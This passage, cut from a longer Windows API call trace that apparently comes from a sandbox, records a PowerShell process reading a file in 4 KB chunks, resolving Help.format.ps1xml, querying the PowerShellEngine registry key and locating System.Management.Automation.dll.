lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.565] GetLastError () returned 0x0 [0044.565] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.565] GetLastError () returned 0x0 [0044.565] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.566] GetLastError () returned 0x0 [0044.566] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.566] GetLastError () returned 0x0 [0044.566] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.566] GetLastError () returned 0x0 [0044.566] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.566] GetLastError () returned 0x0 [0044.567] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.567] GetLastError () returned 0x0 [0044.567] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.567] GetLastError () returned 0x0 [0044.567] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.567] GetLastError () returned 0x0 [0044.567] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.567] GetLastError () returned 0x0 [0044.567] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.567] GetLastError () returned 0x0 [0044.567] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.567] GetLastError () returned 0x0 [0044.567] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.568] GetLastError () returned 0x0 [0044.568] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.568] GetLastError () returned 0x0 [0044.569] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.569] GetLastError () returned 0x0 [0044.570] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.570] GetLastError () returned 0x0 [0044.570] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.570] GetLastError () returned 0x0 [0044.570] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.570] GetLastError () returned 0x0 [0044.570] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.570] GetLastError () returned 0x0 [0044.570] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.570] GetLastError () returned 0x0 [0044.570] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.570] GetLastError () returned 0x0 [0044.570] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.570] GetLastError () returned 0x0 [0044.571] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.571] GetLastError () returned 0x0 [0044.571] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.571] GetLastError () returned 0x0 [0044.571] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.571] GetLastError () returned 0x0 [0044.571] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.571] GetLastError () returned 0x0 [0044.571] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.571] GetLastError () returned 0x0 [0044.571] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.571] GetLastError () returned 0x0 [0044.571] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.571] GetLastError () returned 0x0 [0044.572] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.572] GetLastError () returned 0x0 [0044.574] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.574] GetLastError () returned 0x0 [0044.574] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.574] GetLastError () returned 0x0 [0044.574] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.574] GetLastError () returned 0x0 [0044.574] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.574] GetLastError () returned 0x0 [0044.575] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.575] GetLastError () returned 0x0 [0044.575] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.575] GetLastError () returned 0x0 [0044.575] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.575] GetLastError () returned 0x0 [0044.575] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.575] GetLastError () returned 0x0 [0044.575] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.575] GetLastError () returned 0x0 [0044.575] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.575] GetLastError () returned 0x0 [0044.576] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.576] GetLastError () returned 0x0 [0044.576] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.576] GetLastError () returned 0x0 [0044.576] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.576] GetLastError () returned 0x0 [0044.576] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.576] GetLastError () returned 0x0 [0044.576] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.576] GetLastError () returned 0x0 [0044.576] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.576] GetLastError () returned 0x0 [0044.576] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.576] GetLastError () returned 0x0 [0044.577] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.577] GetLastError () returned 0x0 [0044.577] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.577] GetLastError () returned 0x0 [0044.577] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.577] GetLastError () returned 0x0 [0044.577] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.577] GetLastError () returned 0x0 [0044.577] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.577] GetLastError () returned 0x0 [0044.577] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.577] GetLastError () returned 0x0 [0044.577] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.577] GetLastError () returned 0x0 [0044.578] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.578] GetLastError () returned 0x0 [0044.578] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.578] GetLastError () returned 0x0 [0044.578] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.578] GetLastError () returned 0x0 [0044.578] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.578] GetLastError () returned 0x0 [0044.578] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.578] GetLastError () returned 0x0 [0044.578] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.578] GetLastError () returned 0x0 [0044.578] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0xf37, lpOverlapped=0x0) returned 1 [0044.578] GetLastError () returned 0x0 [0044.579] ReadFile (in: hFile=0x314, lpBuffer=0x31501bf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x31501bf*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.579] GetLastError () returned 0x0 [0044.579] ReadFile (in: hFile=0x314, lpBuffer=0x3150ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3150ae8*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.579] GetLastError () returned 0x0 [0044.579] CloseHandle (hObject=0x314) returned 1 [0044.579] GetLastError () returned 0x0 [0044.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25def4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0044.579] GetLastError () returned 0x0 [0044.579] SetErrorMode (uMode=0x1) returned 0x1 [0044.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3171ae4 | out: lpFileInformation=0x3171ae4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0044.579] GetLastError () returned 0x0 [0044.579] SetErrorMode (uMode=0x1) returned 0x1 [0044.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0044.579] GetLastError () returned 0x0 [0044.579] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x314) returned 0x0 [0044.579] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.579] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.580] RegCloseKey (hKey=0x314) returned 0x0 [0044.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0044.580] GetLastError () returned 0x0 [0044.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0044.580] GetLastError () returned 0x0 [0044.586] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x612f276, Data2=0x60da, Data3=0x4869, Data4=([0]=0xa0, [1]=0x2c, [2]=0x26, [3]=0xc9, [4]=0xd9, [5]=0x67, [6]=0x48, [7]=0x9b))) returned 0x0 [0044.586] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xbd75cb97, Data2=0xf5fd, Data3=0x4710, Data4=([0]=0x82, [1]=0xbc, [2]=0xab, [3]=0x67, [4]=0x2b, [5]=0x7c, [6]=0xcb, [7]=0x3f))) returned 0x0 [0044.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.586] GetLastError () returned 0x0 [0044.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.586] GetLastError () returned 0x0 [0044.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.586] GetLastError () returned 0x0 [0044.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.586] GetLastError () returned 0x0 [0044.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.613] GetLastError () returned 0x0 [0044.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.613] GetLastError () returned 0x0 [0044.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.613] GetLastError () returned 0x0 [0044.613] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x5511acbc, Data2=0x5dc0, Data3=0x4396, Data4=([0]=0xa1, [1]=0xb7, [2]=0xd8, [3]=0xa0, [4]=0xbc, [5]=0x18, [6]=0x26, [7]=0x5e))) returned 0x0 [0044.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.613] GetLastError () returned 0x0 [0044.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: 